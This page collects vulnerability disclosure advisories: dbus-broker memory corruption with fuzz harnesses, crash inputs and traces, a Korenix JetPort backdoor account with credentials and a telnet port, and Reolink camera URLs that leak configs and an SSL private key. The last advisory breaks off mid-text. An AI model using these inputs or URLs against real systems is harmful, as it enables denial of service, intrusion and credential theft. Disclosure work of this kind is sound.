<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220602-0 ><br />=======================================================================<br /> title: Multiple Memory Corruption Vulnerabilities<br /> product: dbus-broker<br /> vulnerable version: dbus-broker-29<br /> fixed version: dbus-broker-31<br /> CVE number: CVE-2022-31212, CVE-2022-31213<br /> impact: medium<br /> homepage: https://github.com/bus1/dbus-broker<br /> found: 2022-01-14<br /> by: S. Robertz (Office Vienna)<br /> G. Hechenberger (Office Vienna)<br /> T. Weber (Office Vienna)<br /> T. Longin (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"The dbus-broker project is an implementation of a message bus as defined by<br />the D-Bus specification. 
Its aim is to provide high performance and<br />reliability, while keeping compatibility to the D-Bus reference implementation.<br />It is exclusively written for Linux systems, and makes use of many modern<br />features provided by recent linux kernel releases."<br /><br />Source: https://github.com/bus1/dbus-broker<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Stack-Buffer Over-Read (CVE-2022-31212)<br />Dbus-Broker depends on c-util/c-shquote to parse a DBus service's Exec line.<br />c-shquote contains a stack buffer over-read if a malicious Exec line is<br />supplied.<br /><br />2) Null Pointer Dereference (CVE-2022-31213)<br />Multiple Null pointer dereferences occur when a malformed XML config file is<br />supplied.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Stack-Buffer Over-Read (CVE-2022-31212)<br />The following harness was used to fuzz the function c_shquote_parse_argv() as<br />it is used in src/launch/launcher.c of dbus-broker.<br /><br />------------------------------------------------------<br />#include <sys/types.h><br />#include <unistd.h><br />#include <stdio.h><br />#include <string.h><br />#include "c-shquote.h"<br /><br />#define SIZE_65KB 66560<br /><br />int main(int argc, char** argv) {<br /> char fuzz_buf[SIZE_65KB] = ""; /* zero-filled, so the input stays NUL-terminated */<br /> ssize_t fuzz_len = read(STDIN_FILENO, fuzz_buf, SIZE_65KB - 1);<br /> char **out_argv;<br /> size_t out_argc; /* c_shquote_parse_argv() takes a size_t *argcp */<br /> if (fuzz_len < 0)<br /> return 1;<br /> c_shquote_parse_argv(&out_argv, &out_argc, fuzz_buf, strlen(fuzz_buf));<br /> return 0;<br />}<br />----------------------------------------------------------<br /><br />Passing \xff to the STDIN of the test harness causes the following crash:<br /><br />----------------------------------------------------------<br />==21744==ERROR: AddressSanitizer: stack-buffer-overflow on address 
0x7fff98c675bf at pc<br />0x558e29cacc02 bp 0x7fff98c67490 sp 0x7fff98c67488<br />READ of size 1 at 0x7fff98c675bf thread T0<br />#0 0x558e29cacc01 in c_shquote_strncspn c-shquote/src/c-shquote.c:119:21<br />#1 0x558e29caff15 in c_shquote_parse_next c-shquote/src/c-shquote.c:540:31<br />#2 0x558e29cb09c2 in c_shquote_parse_argv c-shquote/src/c-shquote.c:620:21<br />#3 0x558e29cab7e9 in c-shquote/src/argv_parser.c:23:2<br />#4 0x7f07953a8b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)<br />#5 0x558e29bca15d in _start (c-shquote/src/harness_argv_parser+0x2015d)<br />Address 0x7fff98c675bf is located in stack of thread T0 at offset 287 in frame<br />#0 0x558e29cac54f in c_shquote_strncspn c-shquote/src/c-shquote.c:102<br />This frame has 1 object(s):<br />[32, 287) 'buffer' (line 103) <== Memory access at offset 287 overflows this variable<br />HINT: this may be a false positive if your program uses some custom stack unwind mechanism,<br />swapcontext or vfork<br />(longjmp and C++ exceptions *are* supported)<br />SUMMARY: AddressSanitizer: stack-buffer-overflow c-shquote/src/c-shquote.c:119:21 in<br />c_shquote_strncspn<br />Shadow bytes around the buggy address:<br />0x100073184e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />0x100073184e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />0x100073184e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />0x100073184e90: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00 00 00 00<br />0x100073184ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />=>0x100073184eb0: 00 00 00 00 00 00 00[07]f3 f3 f3 f3 f3 f3 f3 f3<br />0x100073184ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />0x100073184ed0: 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2<br />0x100073184ee0: 00 f2 f2 f2 00 f3 f3 f3 00 00 00 00 00 00 00 00<br />0x100073184ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />0x100073184f00: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2<br />Shadow byte legend (one shadow byte represents 
8 application bytes):<br />Addressable: 00<br />Partially addressable: 01 02 03 04 05 06 07<br />Heap left redzone: fa<br />Freed heap region: fd<br />Stack left redzone: f1<br />Stack mid redzone: f2<br />Stack right redzone:f3<br />Stack after return: f5<br />Stack use after scope: f8<br />Global redzone: f9<br />Global init order: f6<br />Poisoned by user: f7<br />Container overflow: fc<br />Array cookie: ac<br />Intra object redzone: bb<br />ASan internal: fe<br />Left alloca redzone: ca<br />Right alloca redzone: cb<br />==21744==ABORTING<br />------------------------------------------------------<br /><br />The error occurs in the functions c_shquote_strnspn() and c_shquote_strncspn().<br />Both declare a lookup table on the stack like this:<br /><br />bool buffer[UCHAR_MAX] = {};<br /><br />UCHAR_MAX is defined in the C standard header limits.h and equals 255. Thus,<br />only the array indexes 0-254 are in bounds.<br /><br />However, the buffer is then accessed like this:<br />buffer[(unsigned char)string[i]], where string is the command line from STDIN<br />(or the Exec line in the case of dbus-broker services).<br />Passing \xff (255) thus reads one element past the end of the array.<br /><br /><br />2) Null Pointer Dereference (CVE-2022-31213)<br />The dbus-broker config parser uses the expat library to parse XML files.<br /><br /><limit name="max_pendingonment"/> is well-formed XML, so expat parses it<br />without error. As no value is supplied in the element, the<br />limit_max_pendingonment parameter is left as a Null pointer. 
dbus-broker does<br />not validate the result and dereferences the field, causing a crash.<br />Multiple other XML edge cases can be found that cause the expat library to<br />correctly return a Null pointer which dbus-broker then fails to handle.<br /><br />Including <limit name="max_pendingonment"/> in the config file causes the following error message:<br />-------------------------<br />Program received signal SIGSEGV, Segmentation fault.<br />0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6<br />Missing separate debuginfos, use: yum debuginfo-install expat-2.2.5-4.el8.x86_64 libblkid-<br />2.32.1-28.el8.x86_64 libcap-2.26-5.el8.x86_64 libgcc-8.5.0-4.el8_5.x86_64 libmount-2.32.1-<br />28.el8.x86_64 libselinux-2.9-5.el8.x86_64 libuuid-2.32.1-28.el8.x86_64 pcre2-10.32-<br />2.el8.x86_64 sssd-client-2.5.2-2.el8_5.1.x86_64 systemd-libs-239-51.el8.x86_64<br />(gdb) bt<br />#0 0x00007ffff782474a in ____strtoull_l_internal () from /lib64/libc.so.6<br />#1 0x000000000040cf0a in util_strtou64 (valp=valp@entry=0x828bc8, string=0x0) at<br />../src/util/string.c:42<br />#2 0x0000000000408f07 in config_parser_end_fn (userdata=0x7fffffffdf58, name=0x82278c<br />"limit") at ../src/launch/config.c:1140<br />#3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1<br />#4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1<br />#5 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1<br />#6 0x000000000040425f in config_parser_include (parser=0x7fffffffdf50, root=0x0,<br />node=<optimized out>, nss_cache=0x7fffffffdf30, dirwatch=0x8192a0) at<br />../src/launch/config.c:1289<br />#7 config_parser_read (parser=parser@entry=0x7fffffffdf50, rootp=rootp@entry=0x7fffffffdf28,<br />path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf30, dirwatch=0x8192a0) at<br />../src/launch/config.c:1347<br />#8 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe098) at<br />../src/launch/harness-config.c:24<br 
/>-------------------------<br /><br /><br />The following harness was used:<br /><br />-------------------------<br />#include <c-list.h><br />#include <c-stdaux.h><br />#include <stdlib.h><br />#include "launch/config.h"<br />#include "launch/nss-cache.h"<br />#include "util/dirwatch.h"<br /><br />int main(int argc, char **argv) {<br />_c_cleanup_(config_parser_deinit) ConfigParser parser = CONFIG_PARSER_NULL(parser);<br />_c_cleanup_(config_root_freep) ConfigRoot *rootp = NULL;<br />_c_cleanup_(nss_cache_deinit) NSSCache nss_cache = NSS_CACHE_INIT;<br />_c_cleanup_(dirwatch_freep) Dirwatch *dirwatch = NULL;<br />int r;<br />r = dirwatch_new(&dirwatch);<br />config_parser_init(&parser);<br />r = config_parser_read(&parser, &rootp, argv[1], &nss_cache, dirwatch);<br />return 0;<br />}<br />-------------------------<br /><br /><br />The following config file (shown as a hexdump) causes another error:<br />-------------------------<br />00000000: 3c21 2d2d 202d 2d3e 0a0a 3c21 444f 4354 <!-- -->..<!DOCT<br />00000010: 5950 4520 6720 5055 424c 4943 2022 2d2f YPE g PUBLIC "-/<br />00000020: 4e22 0a20 2268 7474 223e 0a3c 6275 7363 N". "htt">.<busc<br />00000030: 6f6e 6669 673e 0a0a 203c 7479 7065 3e73 onfig>.. 
<type>s<br />00000040: 643c 2f74 7970 653e 3c66 6f72 6b2f 3e0a d</type><fork/>.<br />00000050: 203c 7374 616e 6461 7264 5f73 7973 e803 <standard_sys..<br />00000060: 6d5f 7365 7276 6963 6564 6972 732f 3e0a m_servicedirs/>.<br />00000070: 203c 7365 7276 6963 6564 6972 2072 6563 <servicedir rec<br />00000080: 6569 7665 5f74 7970 653d 2265 7272 6f72 eive_type="error<br />00000090: 222f 3e0a 3c61 6c6c 6f77 2072 6563 6569 "/>.<allow recei<br />000000a0: 7665 5f74 7970 653d 2273 6967 6e61 6c22 ve_type="signal"<br />000000b0: 2f3e 2d3e 203c 616c 6c6f 7720 7365 6e64 />-> <allow send<br />000000c0: 5f64 6573 7469 6e61 7469 6f6e 3d22 220a _destination="".<br />000000d0: 2020 2073 656e 645f 696e 7465 7266 6163 send_interfac<br />000000e0: 653d 2222 202f 3e0a 3c61 6c6c 6f77 2073 e="" />.<allow s<br />000000f0: 656e 645f 6465 7374 696e 617d 696f 6e3d end_destina}ion=<br />00000100: 2222 0a20 2020 7365 6e64 5f69 6e74 6572 "". send_inter<br />00000110: 6661 6365 3d22 6f72 6522 2f3e 203c 212d face="ore"/> <!-<br />00000120: 2d20 2d2d 3e20 3c64 656e 7920 7365 6e64 - --> <deny send<br />00000130: 5f64 6573 74 _dest<br />-------------------------<br /><br />The error is the following:<br />-------------------------<br />id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4<br />Unknown element in /fuzzing_Data/dbus-broker-config/out/harness-config2--<br />/crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +8:<br />standard_sysm_servicedirs<br />Unknown attribute in /fuzzing_Data/dbus-broker-config/out/harness-config2--<br />/crashes/id:000047,sig:11,src:000356+000302,time:4820049,execs:17106488,op:splice,rep:4 +9:<br />receive_type="error"<br />Program received signal SIGSEGV, Segmentation fault.<br />0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6<br />#0 0x00007ffff789dc95 in __strlen_avx2 () from /lib64/libc.so.6<br />#1 0x00007ffff78714e2 in strdup () from /lib64/libc.so.6<br />#2 0x0000000000408e96 in 
config_parser_end_fn (userdata=0x7fffffffdf48, name=0x81b45c<br />"servicedir") at ../src/launch/config.c:1130<br />#3 0x00007ffff7ba100f in doContent () from /lib64/libexpat.so.1<br />#4 0x00007ffff7ba20c0 in contentProcessor () from /lib64/libexpat.so.1<br />#5 0x00007ffff7b9fb6b in doProlog () from /lib64/libexpat.so.1<br />#6 0x00007ffff7ba0a5f in prologProcessor () from /lib64/libexpat.so.1<br />#7 0x00007ffff7ba480c in XML_ParseBuffer () from /lib64/libexpat.so.1<br />#8 0x000000000040425f in config_parser_include (parser=0x7fffffffdf40, root=0x0,<br />node=<optimized out>, nss_cache=0x7fffffffdf20, dirwatch=0x8192a0) at<br />../src/launch/config.c:1289<br />#9 config_parser_read (parser=parser@entry=0x7fffffffdf40, rootp=rootp@entry=0x7fffffffdf18,<br />path=<optimized out>, nss_cache=nss_cache@entry=0x7fffffffdf20, dirwatch=0x8192a0) at<br />../src/launch/config.c:1347<br />#10 0x0000000000402c02 in main (argc=<optimized out>, argv=0x7fffffffe088) at<br />../src/launch/harness-config.c:24<br />-------------------------<br /><br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The Git Master branch (dbus-broker-29) has been tested and found to be<br />vulnerable (tested at commit 727bee57cd3e3b5806eb8599abbdd49984b75732).<br /><br />Furthermore, it also contains the vulnerable c-shquote library (tested<br />at commit 83ccc2893385fcca1424b188f0f6c45a62f2b38d).<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-04-01: Contacting vendor email.<br />2022-04-04: Sending advisory via unencrypted email.<br />2022-04-19: Bugs are fixed. New version will be released 2022-04-20.<br />2022-05-10: dbus-broker-30 released.<br />2022-05-16: dbus-broker-31 released with further fixes.<br />2022-06-02: Release of security advisory.<br /><br /><br />Solution:<br />---------<br />Update to the latest version. 
The vendor provided the fixes in v30.<br />v31 is available now and should be used instead, as further bugs have been<br />fixed there:<br /><br />https://github.com/bus1/dbus-broker/releases/tag/v31<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF S. Robertz, G. Hechenberger, T. Weber, T. Longin / @2022<br /><br /></code></pre>
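The two defects described in the dbus-broker advisory above, shown in their corrected form: a lookup table sized UCHAR_MAX + 1 so that the byte \xff is a valid index, and a limit parser that rejects the NULL character data expat delivers for an empty element instead of handing it to strtoull(). This is an added example written for this page, not dbus-broker's or c-shquote's own code; safe_strncspn() and parse_limit_value() are hypothetical names.

```c
#include <ctype.h>
#include <errno.h>
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Example code written for this page; not dbus-broker's or c-shquote's own
 * code. Function names are hypothetical.
 */

/*
 * CVE-2022-31212 pattern: length of the longest prefix of string[0..n_string)
 * that contains none of the bytes in reject[0..n_reject).
 *
 * A byte cast to unsigned char ranges from 0 to UCHAR_MAX (255), so the
 * lookup table needs UCHAR_MAX + 1 entries. The vulnerable variant declared
 * bool buffer[UCHAR_MAX], one entry short: the byte 0xff indexes element
 * 255, one past the end of the table, which is the over-read ASan reported.
 */
size_t safe_strncspn(const char *string, size_t n_string,
                     const char *reject, size_t n_reject)
{
        bool table[UCHAR_MAX + 1] = { false };
        size_t i;

        for (i = 0; i < n_reject; ++i)
                table[(unsigned char)reject[i]] = true;

        for (i = 0; i < n_string; ++i)
                if (table[(unsigned char)string[i]])
                        return i;

        return n_string;
}

/*
 * CVE-2022-31213 pattern: parse the character data collected for a <limit>
 * element into a 64-bit value.
 *
 * For an empty element such as <limit name="max_pendingonment"/> expat
 * delivers no character data, so the collected string is NULL. Passing that
 * NULL to strtoull() is the crash in the advisory's backtrace; here a missing
 * value is reported as -EINVAL. Returns 0 on success, -EINVAL for a missing
 * or malformed value and -ERANGE when the number does not fit.
 */
int parse_limit_value(const char *cdata, uint64_t *out)
{
        unsigned long long value;
        char *end;

        /* No value at all, or not a bare decimal number (strtoull would
         * silently accept whitespace and a leading '-'). */
        if (!cdata || !isdigit((unsigned char)*cdata))
                return -EINVAL;

        errno = 0;
        value = strtoull(cdata, &end, 10);
        if (errno == ERANGE)
                return -ERANGE;
        if (*end != '\0')
                return -EINVAL;   /* trailing garbage after the digits */

        *out = (uint64_t)value;
        return 0;
}

int main(void)
{
        /* Constructed inputs mirroring the advisory's two triggers. */
        static const char exec_line[] = "\xff" "/usr/bin/foo --bar";
        uint64_t limit = 0;

        printf("strncspn over an Exec line starting with \\xff = %zu\n",
               safe_strncspn(exec_line, sizeof(exec_line) - 1, " \t", 2));
        printf("empty <limit/> -> %d\n", parse_limit_value(NULL, &limit));
        printf("<limit>4096</limit> -> %d, value %llu\n",
               parse_limit_value("4096", &limit), (unsigned long long)limit);
        return 0;
}
```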
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220531-0 ><br />=======================================================================<br /> title: Backdoor account<br /> product: Korenix JetPort 5601V3<br /> vulnerable version: Firmware version 1.0<br /> fixed version: None<br /> CVE number: CVE-2020-12501<br /> impact: High<br /> homepage: https://www.korenix.com/<br /> found: 2020-04-06<br /> by: T. Weber (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Korenix Technology, a Beijer group company within the Industrial Communication<br />business area, is a global leading manufacturer providing innovative, market-<br />oriented, value-focused Industrial Wired and Wireless Networking Solutions.<br />With decades of experiences in the industry, we have developed various product<br />lines [...].<br /><br />Our products are mainly applied in SMART industries: Surveillance, Machine-to-<br />Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer<br />base covers different Sales channels, including end-customers, OEMs, system<br />integrators, and brand label partners. 
[...]"<br /><br />Source: https://www.korenix.com/en/about/index.aspx?kind=3<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor stated that they "will not remove the hardcoded backdoor<br />account as it is needed for customer support and it can't be cracked in a reasonable<br />amount of time."<br /><br /><br />SEC Consult recommends not to use those devices in production environments and<br />to perform a thorough security review conducted by security professionals to<br />identify and resolve potential further critical security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Backdoor Accounts (CVE-2020-12501)<br />Multiple different backdoor accounts were found during quick security checks<br />of different firmware files. One backdoor account was tested on a device bought<br />later to verify this specific finding. A telnet service is running on the<br />device by default. This increases the risk of exploitation on the local network.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Backdoor Accounts (CVE-2020-12501)<br />The following account is available on at least one JetPort device of Korenix.<br />There might be more affected devices across this vendor. Westermo and Comtrol<br />devices may be affected too.<br /><br /> * User "superrd", present on:<br /> - JetPort 5601V3<br /> More devices may be affected.<br /><br />Two other users are present on the system according to "/etc/passwd". 
An<br />additional telnet daemon is listening on port 19999.<br /><br />root:<no password><br />superrd:<not cracked><br />admin:admin<br /><br /><br />By inspecting "/etc/passwd", the only user that is allowed to log in<br />to the device is "superrd":<br /><br />root::0:0:root:/root:/bin/false<br />superrd:$1$<redacted>:0:0::/root:/bin/sh<br />admin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true<br /><br /><br />The listener has been identified by using "ps" and "netstat":<br /># ps<br /> PID Uid VmSize Stat Command<br /> 1 root 1452 S init [3]<br />[...]<br /> 253 root 1780 S /usr/bin/ser2net -p 600 -c /tmp/com2ip.conf<br /> 254 root 288 S /usr/sbin/telnetd -p 19999<br /> 289 root 788 S /usr/bin/dropbear<br /> 297 root 1916 S /usr/bin/thttpd -C /etc/thttpd.conf -cert /etc/thttpd<br /><br /># netstat -tulen<br />Active Internet connections (only servers)<br />Proto Recv-Q Send-Q Local Address Foreign Address State<br />[...]<br />tcp 0 0 0.0.0.0:19999 0.0.0.0:* LISTEN<br />[...]<br /><br />The vulnerability has been manually verified on an emulated device<br />by using the MEDUSA scalable firmware runtime.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following product / firmware version has been tested:<br />* Korenix JetPort 5601V3 / 1.0<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2020-04-14: Contacting CERT@VDE through info@cert.vde.com and requested support<br /> for the disclosure process due to the involvement of multiple<br /> vendors.<br />2020-04-15: Security contact responded that the products were developed by<br /> Korenix Technologies.<br />2020-04-30: Security contact informed us that some vulnerabilities were<br /> confirmed by the vendor.<br />2020-07-30: Call with Pepperl+Fuchs contact. 
Contact stated that the<br /> vulnerabilities were reported to Korenix.<br />2020-09-29: Call with Pepperl+Fuchs and CERT@VDE regarding status.<br /> Pepperl+Fuchs stated that they just have a sales contact from<br /> Korenix.<br />2020-10-05: Coordinated release of SA-20201005-0.<br />2020-10-05: Call with the helpdesk of Beijer Electronics AB. The contact stated<br /> that no case regarding vulnerabilities was opened and created one.<br /> The product owners of Westermo, Korenix and Beijer Electronics were<br /> informed via this inquiry. Set disclosure date to 2020-11-25.<br />2020-10-06: Restarted the whole responsible disclosure process by sending a<br /> request to the new security contact cs@beijerelectronics.com.<br />2020-10-07: Received an email from a Korenix representative which offered to<br /> answer questions about product security. Started responsible<br /> disclosure by requesting email certificate or whether plaintext can be<br /> used. Referred to the request to cs@beijerelectronics.com.<br /> No answer.<br />2020-11-11: Asked the representatives of Korenix and Beijer regarding the<br /> status.<br /> No answer.<br />2020-11-25: Phone call with security manager of Beijer. Sent advisories via<br /> encrypted archive to cs@beijerelectronics.com. Received<br /> confirmation of advisory receipt. Security manager told us that he<br /> can provide information regarding the timeline for the patches<br /> within the next two weeks.<br />2020-12-09: Asked for an update.<br />2020-12-18: Call with security manager of Beijer. Vendor presented initial<br /> analysis done by the affected companies.<br />2021-03-21: Security manager invited SEC Consult to have a status meeting.<br />2021-03-26: Agreed on an advisory split as other affected products will get<br /> patched later.<br />2021-04-12: Performed advisory split.<br />2021-05-26: Meeting regarding advisory publication. 
Agreed to release this<br /> advisory in Q4.<br />2021-06-01: Released related advisory SA-20210601-0.<br /><br />2021-06-24: Beijer Electronics contact informs us that he leaves the company<br /> today. Refers us to new contact in CC.<br /><br />2021-07-05: Follow-up meeting with new vendor contact regarding next steps.<br />2021-07-16: Contact from Beijer Electronics reached out to Korenix. Engineers<br /> from Korenix are still investigating the issues. JetWave 2311 went<br /> EoL, next status update in August 2021. JetPort will be fixed in<br /> Q1 2022.<br />2021-09-15: Asked for a status update.<br />2021-09-20: Korenix will provide a time schedule for the patches by end of next<br /> week.<br />2021-09-28: Meeting regarding the schedule. Fixes will be available by end of<br /> the year for Korenix JetWave series.<br />2021-09-28: Update call with vendor; fixes will be available in November.<br />2021-11-18: Contact had difficulties to get a response from Korenix. JetWave<br /> 2212G 1.8.0 has been released, other fixes will be released in<br /> December.<br />2021-11-22: Vendor provides all other fixed versions, which have already been<br /> put online.<br />2021-12-17: Performed another advisory split.<br />2021-12-20: Update call with vendor. Identified another possibly affected<br /> device (JetWave 3420). 
Investigation will be started from Korenix<br /> as soon as possible.<br />2021-12-28: Vendor has rolled out an update for the JetWave 3420 V3 firmware.<br />2022-01-17: Informed vendor about the advisory release within the next two<br /> weeks.<br />2022-01-19: Call with vendor; agreed that advisory can be published for<br /> JetWave series.<br />2022-01-24: Informed vendor about advisory release on 2022-01-31.<br />2022-01-31: Released related advisory SA-20220131-0.<br />2022-02-22: Vendor says that fixes are estimated to be completed by end of<br /> February.<br />2022-03-29: Most issues from the related advisories (SA-20201005-0, SA-20210601-0)<br /> are not applicable according to the vendor, only the backdoor account<br /> exists in the JetPort series. The JetPort series will not go end of life.<br /><br /> The backdoor is needed in order to assist customers with problems and<br /> Korenix claims the password can't be cracked in a reasonable amount of time,<br /> hence it will not be fixed.<br /><br /> Security contact states that there is no point in waiting and we can<br /> release the security advisory.<br /><br />2022-04-05: Another call to clarify with security contact; Korenix will not remove<br /> the account as this issue is not considered as critical.<br />2022-05-18: Tried to re-send the advisory for final review which only contains the<br /> backdoor account information. Received auto-reply that our contact from<br /> Beijer Group (who did the coordination with Korenix) was no longer part<br /> of the company.<br />2022-05-31: Public release of security advisory.<br /><br /><br />Solution:<br />---------<br />None available. 
The vendor stated that they "will not remove the hardcoded backdoor<br />account as it is needed for customer support and it can't be cracked in a reasonable<br />amount of time."<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />EOF Thomas Weber / @2022<br /><br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Reolink E1 Zoom Camera<br />Vendor URL: https://reolink.com/product/e1-zoom/<br />Type: Exposure of Sensitive Information to an Unauthorized Actor [CWE-200]<br />Date found: 2021-08-26<br />Date published: 2022-06-01<br />CVSSv3 Score: 5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)<br />CVE: CVE-2021-40150<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Reolink E1 Zoom Camera 3.0.0.716 (latest) and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Meet new generation of Reolink E1 series. Advanced features - 5MP Super HD<br />& optical zoom are added into this compact camera. Plus two-way audio, remote<br />live view and more smart capacities help you connect with what you care. Be<br />closer to families and be away from worries.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration<br />via the /conf/ directory that is mapped to a publicly accessible path.<br /><br />An unauthenticated attacker with network-level access to the camera can abuse<br />this to download the entire NGINX/FastCGI configuration by querying, e.g.:<br /><br />http://[CAM-IP]/conf/nginx.conf<br />http://[CAM-IP]/conf/fastcgi.conf<br /><br />Etc.<br /><br /><br />6. RISK<br />=======<br />An unauthenticated attacker can download the webserver's configuration files<br />which might lead to sensitive information disclosure.<br /><br /><br />7. SOLUTION<br />===========<br />None.<br /><br /><br />8. 
REPORT TIMELINE<br />==================<br />2021-08-26: Discovery of the vulnerability<br />2021-08-26: Sent notification to Reolink via their support channel<br />2021-08-26: Response from vendor asking for vulnerability details<br />2021-08-26: Sent all the vulnerability details<br />2021-08-31: Vendor is still looking into the issue<br />2021-09-03: Vendor states that the issue will be fixed with the next firmware update by the end of September.<br />2021-10-01: Since no firmware has been released, we've sent another notification<br />2021-10-02: Vendor states that the new firmware is delayed<br />2022-02-01: Since there is still no fix, sent another notification<br />2022-02-02: Vendor states that the firmware with the fix hasn't been released yet.<br />2022-03-03: Since there is still no fix, sent another notification<br />2022-03-12: Vendor states they're still working on the issue (internal update awaits testing)<br />2022-05-24: Since there is still no fix, sent another notification<br />2022-05-24: Vendor states that the update still hasn't been released yet.<br />2022-06-01: Almost a year should be enough to fix this. Public disclosure.<br /><br /><br />9. REFERENCES<br />=============<br />https://github.com/MrTuxracer/advisories<br /></code></pre>
<pre><code>RCE Security Advisory<br />https://www.rcesecurity.com<br /><br /><br />1. ADVISORY INFORMATION<br />=======================<br />Product: Reolink E1 Zoom Camera<br />Vendor URL: https://reolink.com/product/e1-zoom/<br />Type: Exposure of Sensitive Information to an Unauthorized Actor [CWE-200]<br />Date found: 2021-08-26<br />Date published: 2022-06-01<br />CVSSv3 Score: 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)<br />CVE: CVE-2021-40149<br /><br /><br />2. CREDITS<br />==========<br />This vulnerability was discovered and researched by Julien Ahrens from<br />RCE Security.<br /><br /><br />3. VERSIONS AFFECTED<br />====================<br />Reolink E1 Zoom Camera 3.0.0.716 (latest) and below<br /><br /><br />4. INTRODUCTION<br />===============<br />Meet new generation of Reolink E1 series. Advanced features - 5MP Super<br />HD & optical zoom are added into this compact camera. Plus two-way audio,<br />remote live view and more smart capacities help you connect with what you<br />care. Be closer to families and be away from worries.<br /><br />(from the vendor's homepage)<br /><br /><br />5. VULNERABILITY DETAILS<br />========================<br />The web server of the E1 Zoom camera through 3.0.0.716 discloses its SSL private<br />key via the root web server directory.<br /><br />An unauthenticated attacker can abuse this with network-level access to the<br />camera to download the webserver's private SSL key by simply going to the<br />following URL:<br /><br />http://[CAM-IP]/self.key<br /><br /><br />6. RISK<br />=======<br />An unauthenticated attacker can download the webserver's SSL private key and<br />thereby attack the encrypted network traffic to and from the camera, which might<br />lead to the disclosure of the administrative access credentials and other<br />sensitive information.<br /><br /><br />7. SOLUTION<br />===========<br />None.<br /><br /><br />8. 
